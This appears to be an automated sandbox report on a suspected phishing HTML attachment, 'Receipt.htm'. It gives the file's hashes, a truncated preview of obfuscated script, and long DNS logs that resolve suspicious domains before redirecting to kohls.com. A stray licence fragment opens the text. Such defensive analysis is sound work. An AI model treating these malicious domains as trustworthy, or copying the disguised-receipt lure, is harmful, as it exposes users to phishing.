BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR

File type:	HTML document, ASCII text, with very long lines (1098), with CRLF line terminators
Entropy (8bit):	5.74254293642243
TrID:	HyperText Markup Language (6006/1) 100.00%
File name:	Receipt.htm
File size:	1'346 bytes
MD5:	2d1c51a16dca3b4aecc67dcfe19184bd
SHA1:	22ea64712ae83cde0fa0922327d04b0db75c0ec6
SHA256:	49e415c160af7a6ff54d2c87395d10702b45a1d7dc7120d376c10ceb7f9179f5
SHA512:	9070a54cddb1b3f97330e6a473ef653a858cada7f9f402005a3cd104079c41384c24d88c75cf5703e98aa543e4471f548d80242712d6d8ead433de090e29a994
SSDEEP:	24:kK+PDZKIRGUOWT6CK6sXSuCD7ZAL58deDh+YLyzrguiVk+BsXXe8QHOMP:9YVKIgUVT6jvXSpD7Wl8deDh+Ycrg/6I
TLSH:	9C2136842F4775793A70713808CE6505EA5C90875A0C624071AFE073BEB7758BAF3AE8
File Content Preview:	<html> <div> The artist sculpted a figure from clay. </div> --> <!DOCTYPE html>..<html lang="en">..<span style='display:none;'> The artist captured the essence of the subject. </span>..<script>..function dipper(swifttail, horseta

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 30, 2024 16:05:28.132709980 CET	192.168.2.4	1.1.1.1	0x1270	Standard query (0)	teacurl.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:28.132977009 CET	192.168.2.4	1.1.1.1	0xcc02	Standard query (0)	teacurl.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:29.183585882 CET	192.168.2.4	1.1.1.1	0x30d3	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:29.184000969 CET	192.168.2.4	1.1.1.1	0x5686	Standard query (0)	cdnjs.cloudflare.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:29.193795919 CET	192.168.2.4	1.1.1.1	0x12d	Standard query (0)	teacurl.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:29.193934917 CET	192.168.2.4	1.1.1.1	0xce6f	Standard query (0)	teacurl.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:30.312410116 CET	192.168.2.4	1.1.1.1	0x4f63	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:30.312555075 CET	192.168.2.4	1.1.1.1	0x6726	Standard query (0)	cdnjs.cloudflare.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:30.350895882 CET	192.168.2.4	1.1.1.1	0x11d0	Standard query (0)	rpbr.ithbetoxi.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:30.351178885 CET	192.168.2.4	1.1.1.1	0xef98	Standard query (0)	rpbr.ithbetoxi.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:32.424349070 CET	192.168.2.4	1.1.1.1	0xeab4	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:32.424793959 CET	192.168.2.4	1.1.1.1	0x558c	Standard query (0)	www.google.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:32.590485096 CET	192.168.2.4	1.1.1.1	0x5aa9	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:32.590889931 CET	192.168.2.4	1.1.1.1	0xfd8d	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:32.599638939 CET	192.168.2.4	1.1.1.1	0xd418	Standard query (0)	challenges.cloudflare.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:32.599827051 CET	192.168.2.4	1.1.1.1	0xa98d	Standard query (0)	challenges.cloudflare.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:32.601603031 CET	192.168.2.4	1.1.1.1	0xddab	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:32.601739883 CET	192.168.2.4	1.1.1.1	0xa408	Standard query (0)	cdnjs.cloudflare.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:34.427426100 CET	192.168.2.4	1.1.1.1	0x64a8	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:34.427599907 CET	192.168.2.4	1.1.1.1	0x9547	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:34.981745958 CET	192.168.2.4	1.1.1.1	0xe274	Standard query (0)	challenges.cloudflare.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:34.982057095 CET	192.168.2.4	1.1.1.1	0x158f	Standard query (0)	challenges.cloudflare.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:35.005645037 CET	192.168.2.4	1.1.1.1	0x4a39	Standard query (0)	challenges.cloudflare.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:35.006247997 CET	192.168.2.4	1.1.1.1	0x268e	Standard query (0)	challenges.cloudflare.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:37.583945990 CET	192.168.2.4	1.1.1.1	0x2506	Standard query (0)	a.nel.cloudflare.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:37.584115028 CET	192.168.2.4	1.1.1.1	0x29de	Standard query (0)	a.nel.cloudflare.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:52.670311928 CET	192.168.2.4	1.1.1.1	0xfa3e	Standard query (0)	sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:52.670687914 CET	192.168.2.4	1.1.1.1	0xab9f	Standard query (0)	sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:54.125530958 CET	192.168.2.4	1.1.1.1	0xa5ae	Standard query (0)	www.kohls.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:54.125751972 CET	192.168.2.4	1.1.1.1	0xdbad	Standard query (0)	www.kohls.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:54.164982080 CET	192.168.2.4	1.1.1.1	0x9df6	Standard query (0)	sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:54.165859938 CET	192.168.2.4	1.1.1.1	0x1100	Standard query (0)	sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:55.478302002 CET	192.168.2.4	1.1.1.1	0xb15b	Standard query (0)	csp38.domdog.io	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:55.478646040 CET	192.168.2.4	1.1.1.1	0xe780	Standard query (0)	csp38.domdog.io	65	IN (0x0001)	false
Oct 30, 2024 16:05:55.511369944 CET	192.168.2.4	1.1.1.1	0xf07f	Standard query (0)	cdn.dynamicyield.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:55.511857033 CET	192.168.2.4	1.1.1.1	0xad7e	Standard query (0)	cdn.dynamicyield.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:55.517153025 CET	192.168.2.4	1.1.1.1	0x447	Standard query (0)	assetcert.kohls.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:55.517508030 CET	192.168.2.4	1.1.1.1	0x4ac0	Standard query (0)	assetcert.kohls.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:55.589848042 CET	192.168.2.4	1.1.1.1	0x9ad1	Standard query (0)	media.kohlsimg.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:55.590272903 CET	192.168.2.4	1.1.1.1	0x3a5c	Standard query (0)	media.kohlsimg.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:56.715779066 CET	192.168.2.4	1.1.1.1	0xe594	Standard query (0)	media.kohlsimg.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:56.715939999 CET	192.168.2.4	1.1.1.1	0x8ae0	Standard query (0)	media.kohlsimg.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:57.328197002 CET	192.168.2.4	1.1.1.1	0x524f	Standard query (0)	st.dynamicyield.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.328505039 CET	192.168.2.4	1.1.1.1	0xbef7	Standard query (0)	st.dynamicyield.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:57.339010000 CET	192.168.2.4	1.1.1.1	0xa641	Standard query (0)	rcom.dynamicyield.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.342627048 CET	192.168.2.4	1.1.1.1	0x53f9	Standard query (0)	rcom.dynamicyield.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:57.420648098 CET	192.168.2.4	1.1.1.1	0x420d	Standard query (0)	async-px.dynamicyield.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.421494961 CET	192.168.2.4	1.1.1.1	0x7776	Standard query (0)	async-px.dynamicyield.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:57.488384008 CET	192.168.2.4	1.1.1.1	0x75de	Standard query (0)	www.kohls.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.488992929 CET	192.168.2.4	1.1.1.1	0xe4dc	Standard query (0)	www.kohls.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:57.501312971 CET	192.168.2.4	1.1.1.1	0x585f	Standard query (0)	assetcert.kohls.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.501554012 CET	192.168.2.4	1.1.1.1	0xe41c	Standard query (0)	assetcert.kohls.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:57.550911903 CET	192.168.2.4	1.1.1.1	0xc781	Standard query (0)	cdn.dynamicyield.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.551071882 CET	192.168.2.4	1.1.1.1	0x13b5	Standard query (0)	cdn.dynamicyield.com	65	IN (0x0001)	false
Oct 30, 2024 16:05:59.188792944 CET	192.168.2.4	1.1.1.1	0xfbc7	Standard query (0)	s2.go-mpulse.net	65	IN (0x0001)	false
Oct 30, 2024 16:05:59.188792944 CET	192.168.2.4	1.1.1.1	0xe020	Standard query (0)	s2.go-mpulse.net	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:59.194312096 CET	192.168.2.4	1.1.1.1	0x1dee	Standard query (0)	tag.getamigo.io	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:59.194550037 CET	192.168.2.4	1.1.1.1	0xeaf1	Standard query (0)	tag.getamigo.io	65	IN (0x0001)	false
Oct 30, 2024 16:06:00.251621008 CET	192.168.2.4	1.1.1.1	0x5301	Standard query (0)	tag.getamigo.io	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:00.251773119 CET	192.168.2.4	1.1.1.1	0x4809	Standard query (0)	tag.getamigo.io	65	IN (0x0001)	false
Oct 30, 2024 16:06:00.852683067 CET	192.168.2.4	1.1.1.1	0x2af1	Standard query (0)	c.go-mpulse.net	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:00.852911949 CET	192.168.2.4	1.1.1.1	0xda8a	Standard query (0)	c.go-mpulse.net	65	IN (0x0001)	false
Oct 30, 2024 16:06:01.168966055 CET	192.168.2.4	1.1.1.1	0x1c19	Standard query (0)	s2.go-mpulse.net	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:01.169218063 CET	192.168.2.4	1.1.1.1	0xa6be	Standard query (0)	s2.go-mpulse.net	65	IN (0x0001)	false
Oct 30, 2024 16:06:03.498099089 CET	192.168.2.4	1.1.1.1	0x9504	Standard query (0)	c.go-mpulse.net	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:03.498403072 CET	192.168.2.4	1.1.1.1	0x6713	Standard query (0)	c.go-mpulse.net	65	IN (0x0001)	false
Oct 30, 2024 16:06:07.203378916 CET	192.168.2.4	1.1.1.1	0x23be	Standard query (0)	st.dynamicyield.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:07.203551054 CET	192.168.2.4	1.1.1.1	0xcbc0	Standard query (0)	st.dynamicyield.com	65	IN (0x0001)	false
Oct 30, 2024 16:06:07.310870886 CET	192.168.2.4	1.1.1.1	0x52b4	Standard query (0)	684dd32a.akstat.io	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:07.311063051 CET	192.168.2.4	1.1.1.1	0x1c	Standard query (0)	684dd32a.akstat.io	65	IN (0x0001)	false
Oct 30, 2024 16:06:08.373845100 CET	192.168.2.4	1.1.1.1	0x91ac	Standard query (0)	async-px.dynamicyield.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:08.374172926 CET	192.168.2.4	1.1.1.1	0xe0f0	Standard query (0)	async-px.dynamicyield.com	65	IN (0x0001)	false
Oct 30, 2024 16:06:08.396045923 CET	192.168.2.4	1.1.1.1	0x5453	Standard query (0)	rcom.dynamicyield.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:08.396228075 CET	192.168.2.4	1.1.1.1	0x5021	Standard query (0)	rcom.dynamicyield.com	65	IN (0x0001)	false
Oct 30, 2024 16:07:11.793096066 CET	192.168.2.4	1.1.1.1	0xd095	Standard query (0)	www.kohls.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:07:11.793324947 CET	192.168.2.4	1.1.1.1	0x6e55	Standard query (0)	www.kohls.com	65	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 30, 2024 16:05:28.341994047 CET	1.1.1.1	192.168.2.4	0x1270	No error (0)	teacurl.com		69.49.245.172	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:29.191535950 CET	1.1.1.1	192.168.2.4	0x30d3	No error (0)	cdnjs.cloudflare.com		104.17.24.14	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:29.191535950 CET	1.1.1.1	192.168.2.4	0x30d3	No error (0)	cdnjs.cloudflare.com		104.17.25.14	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:29.192122936 CET	1.1.1.1	192.168.2.4	0x5686	No error (0)	cdnjs.cloudflare.com			65	IN (0x0001)	false
Oct 30, 2024 16:05:29.207079887 CET	1.1.1.1	192.168.2.4	0x12d	No error (0)	teacurl.com		69.49.245.172	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:30.319979906 CET	1.1.1.1	192.168.2.4	0x6726	No error (0)	cdnjs.cloudflare.com			65	IN (0x0001)	false
Oct 30, 2024 16:05:30.320400000 CET	1.1.1.1	192.168.2.4	0x4f63	No error (0)	cdnjs.cloudflare.com		104.17.25.14	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:30.320400000 CET	1.1.1.1	192.168.2.4	0x4f63	No error (0)	cdnjs.cloudflare.com		104.17.24.14	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:30.366039038 CET	1.1.1.1	192.168.2.4	0xef98	No error (0)	rpbr.ithbetoxi.com			65	IN (0x0001)	false
Oct 30, 2024 16:05:30.519951105 CET	1.1.1.1	192.168.2.4	0x11d0	No error (0)	rpbr.ithbetoxi.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:30.519951105 CET	1.1.1.1	192.168.2.4	0x11d0	No error (0)	rpbr.ithbetoxi.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:32.432054996 CET	1.1.1.1	192.168.2.4	0xeab4	No error (0)	www.google.com		142.250.186.164	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:32.432123899 CET	1.1.1.1	192.168.2.4	0x558c	No error (0)	www.google.com			65	IN (0x0001)	false
Oct 30, 2024 16:05:32.599308968 CET	1.1.1.1	192.168.2.4	0x5aa9	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:32.599308968 CET	1.1.1.1	192.168.2.4	0x5aa9	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:32.599308968 CET	1.1.1.1	192.168.2.4	0x5aa9	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:32.599308968 CET	1.1.1.1	192.168.2.4	0x5aa9	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:32.606972933 CET	1.1.1.1	192.168.2.4	0xd418	No error (0)	challenges.cloudflare.com		104.18.94.41	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:32.606972933 CET	1.1.1.1	192.168.2.4	0xd418	No error (0)	challenges.cloudflare.com		104.18.95.41	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:32.607455015 CET	1.1.1.1	192.168.2.4	0xa98d	No error (0)	challenges.cloudflare.com			65	IN (0x0001)	false
Oct 30, 2024 16:05:32.608867884 CET	1.1.1.1	192.168.2.4	0xa408	No error (0)	cdnjs.cloudflare.com			65	IN (0x0001)	false
Oct 30, 2024 16:05:32.609091997 CET	1.1.1.1	192.168.2.4	0xddab	No error (0)	cdnjs.cloudflare.com		104.17.24.14	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:32.609091997 CET	1.1.1.1	192.168.2.4	0xddab	No error (0)	cdnjs.cloudflare.com		104.17.25.14	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:34.434979916 CET	1.1.1.1	192.168.2.4	0x64a8	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:34.434979916 CET	1.1.1.1	192.168.2.4	0x64a8	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:34.434979916 CET	1.1.1.1	192.168.2.4	0x64a8	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:34.434979916 CET	1.1.1.1	192.168.2.4	0x64a8	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:34.990312099 CET	1.1.1.1	192.168.2.4	0xe274	No error (0)	challenges.cloudflare.com		104.18.95.41	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:34.990312099 CET	1.1.1.1	192.168.2.4	0xe274	No error (0)	challenges.cloudflare.com		104.18.94.41	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:34.990328074 CET	1.1.1.1	192.168.2.4	0x158f	No error (0)	challenges.cloudflare.com			65	IN (0x0001)	false
Oct 30, 2024 16:05:35.013581991 CET	1.1.1.1	192.168.2.4	0x4a39	No error (0)	challenges.cloudflare.com		104.18.94.41	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:35.013581991 CET	1.1.1.1	192.168.2.4	0x4a39	No error (0)	challenges.cloudflare.com		104.18.95.41	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:35.013952017 CET	1.1.1.1	192.168.2.4	0x268e	No error (0)	challenges.cloudflare.com			65	IN (0x0001)	false
Oct 30, 2024 16:05:37.591609001 CET	1.1.1.1	192.168.2.4	0x2506	No error (0)	a.nel.cloudflare.com		35.190.80.1	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:52.687726974 CET	1.1.1.1	192.168.2.4	0xfa3e	No error (0)	sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.com		172.67.187.119	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:52.687726974 CET	1.1.1.1	192.168.2.4	0xfa3e	No error (0)	sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.com		104.21.32.205	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:52.849787951 CET	1.1.1.1	192.168.2.4	0xab9f	No error (0)	sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.com			65	IN (0x0001)	false
Oct 30, 2024 16:05:54.134941101 CET	1.1.1.1	192.168.2.4	0xdbad	No error (0)	www.kohls.com	prod-edge.kohls.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:54.135493994 CET	1.1.1.1	192.168.2.4	0xa5ae	No error (0)	www.kohls.com	prod-edge.kohls.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:54.179241896 CET	1.1.1.1	192.168.2.4	0x1100	No error (0)	sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.com			65	IN (0x0001)	false
Oct 30, 2024 16:05:54.200995922 CET	1.1.1.1	192.168.2.4	0x9df6	No error (0)	sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.com		172.67.187.119	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:54.200995922 CET	1.1.1.1	192.168.2.4	0x9df6	No error (0)	sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.com		104.21.32.205	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:55.488192081 CET	1.1.1.1	192.168.2.4	0xb15b	No error (0)	csp38.domdog.io		104.22.50.233	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:55.488192081 CET	1.1.1.1	192.168.2.4	0xb15b	No error (0)	csp38.domdog.io		172.67.4.24	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:55.488192081 CET	1.1.1.1	192.168.2.4	0xb15b	No error (0)	csp38.domdog.io		104.22.51.233	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:55.488373995 CET	1.1.1.1	192.168.2.4	0xe780	No error (0)	csp38.domdog.io			65	IN (0x0001)	false
Oct 30, 2024 16:05:55.519682884 CET	1.1.1.1	192.168.2.4	0xf07f	No error (0)	cdn.dynamicyield.com	d2uyh1ncuzni57.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:55.519682884 CET	1.1.1.1	192.168.2.4	0xf07f	No error (0)	d2uyh1ncuzni57.cloudfront.net		18.244.18.13	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:55.519682884 CET	1.1.1.1	192.168.2.4	0xf07f	No error (0)	d2uyh1ncuzni57.cloudfront.net		18.244.18.41	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:55.519682884 CET	1.1.1.1	192.168.2.4	0xf07f	No error (0)	d2uyh1ncuzni57.cloudfront.net		18.244.18.45	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:55.519682884 CET	1.1.1.1	192.168.2.4	0xf07f	No error (0)	d2uyh1ncuzni57.cloudfront.net		18.244.18.27	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:55.528939009 CET	1.1.1.1	192.168.2.4	0x447	No error (0)	assetcert.kohls.com	prod-edge.kohls.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:55.533886909 CET	1.1.1.1	192.168.2.4	0xad7e	No error (0)	cdn.dynamicyield.com	d2uyh1ncuzni57.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:55.535094976 CET	1.1.1.1	192.168.2.4	0x4ac0	No error (0)	assetcert.kohls.com	prod-edge.kohls.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:55.598556995 CET	1.1.1.1	192.168.2.4	0x3a5c	No error (0)	media.kohlsimg.com	san5-ion.scene7.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:55.598931074 CET	1.1.1.1	192.168.2.4	0x9ad1	No error (0)	media.kohlsimg.com	san5-ion.scene7.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:56.724358082 CET	1.1.1.1	192.168.2.4	0xe594	No error (0)	media.kohlsimg.com	san5-ion.scene7.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:56.736094952 CET	1.1.1.1	192.168.2.4	0x8ae0	No error (0)	media.kohlsimg.com	san5-ion.scene7.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:57.335418940 CET	1.1.1.1	192.168.2.4	0x524f	No error (0)	st.dynamicyield.com	d1nna0ec3lv40t.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:57.335418940 CET	1.1.1.1	192.168.2.4	0x524f	No error (0)	d1nna0ec3lv40t.cloudfront.net		18.66.122.33	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.335418940 CET	1.1.1.1	192.168.2.4	0x524f	No error (0)	d1nna0ec3lv40t.cloudfront.net		18.66.122.43	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.335418940 CET	1.1.1.1	192.168.2.4	0x524f	No error (0)	d1nna0ec3lv40t.cloudfront.net		18.66.122.83	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.335418940 CET	1.1.1.1	192.168.2.4	0x524f	No error (0)	d1nna0ec3lv40t.cloudfront.net		18.66.122.78	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.336445093 CET	1.1.1.1	192.168.2.4	0xbef7	No error (0)	st.dynamicyield.com	d1nna0ec3lv40t.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:57.346894026 CET	1.1.1.1	192.168.2.4	0xa641	No error (0)	rcom.dynamicyield.com	d22rbd88eku03j.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:57.346894026 CET	1.1.1.1	192.168.2.4	0xa641	No error (0)	d22rbd88eku03j.cloudfront.net		18.245.86.44	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.346894026 CET	1.1.1.1	192.168.2.4	0xa641	No error (0)	d22rbd88eku03j.cloudfront.net		18.245.86.31	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.346894026 CET	1.1.1.1	192.168.2.4	0xa641	No error (0)	d22rbd88eku03j.cloudfront.net		18.245.86.58	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.346894026 CET	1.1.1.1	192.168.2.4	0xa641	No error (0)	d22rbd88eku03j.cloudfront.net		18.245.86.57	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.350310087 CET	1.1.1.1	192.168.2.4	0x53f9	No error (0)	rcom.dynamicyield.com	d22rbd88eku03j.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:57.428519964 CET	1.1.1.1	192.168.2.4	0x420d	No error (0)	async-px.dynamicyield.com		13.35.58.72	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.428519964 CET	1.1.1.1	192.168.2.4	0x420d	No error (0)	async-px.dynamicyield.com		13.35.58.125	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.428519964 CET	1.1.1.1	192.168.2.4	0x420d	No error (0)	async-px.dynamicyield.com		13.35.58.109	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.428519964 CET	1.1.1.1	192.168.2.4	0x420d	No error (0)	async-px.dynamicyield.com		13.35.58.129	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.497528076 CET	1.1.1.1	192.168.2.4	0x75de	No error (0)	www.kohls.com	prod-edge.kohls.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:57.497553110 CET	1.1.1.1	192.168.2.4	0xe4dc	No error (0)	www.kohls.com	prod-edge.kohls.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:57.518610001 CET	1.1.1.1	192.168.2.4	0xe41c	No error (0)	assetcert.kohls.com	prod-edge.kohls.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:57.526312113 CET	1.1.1.1	192.168.2.4	0x585f	No error (0)	assetcert.kohls.com	prod-edge.kohls.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:57.559063911 CET	1.1.1.1	192.168.2.4	0x13b5	No error (0)	cdn.dynamicyield.com	d2uyh1ncuzni57.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:57.559890032 CET	1.1.1.1	192.168.2.4	0xc781	No error (0)	cdn.dynamicyield.com	d2uyh1ncuzni57.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:57.559890032 CET	1.1.1.1	192.168.2.4	0xc781	No error (0)	d2uyh1ncuzni57.cloudfront.net		18.244.18.13	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.559890032 CET	1.1.1.1	192.168.2.4	0xc781	No error (0)	d2uyh1ncuzni57.cloudfront.net		18.244.18.27	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.559890032 CET	1.1.1.1	192.168.2.4	0xc781	No error (0)	d2uyh1ncuzni57.cloudfront.net		18.244.18.41	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:05:57.559890032 CET	1.1.1.1	192.168.2.4	0xc781	No error (0)	d2uyh1ncuzni57.cloudfront.net		18.244.18.45	A (IP address)	IN (0x0001)	false
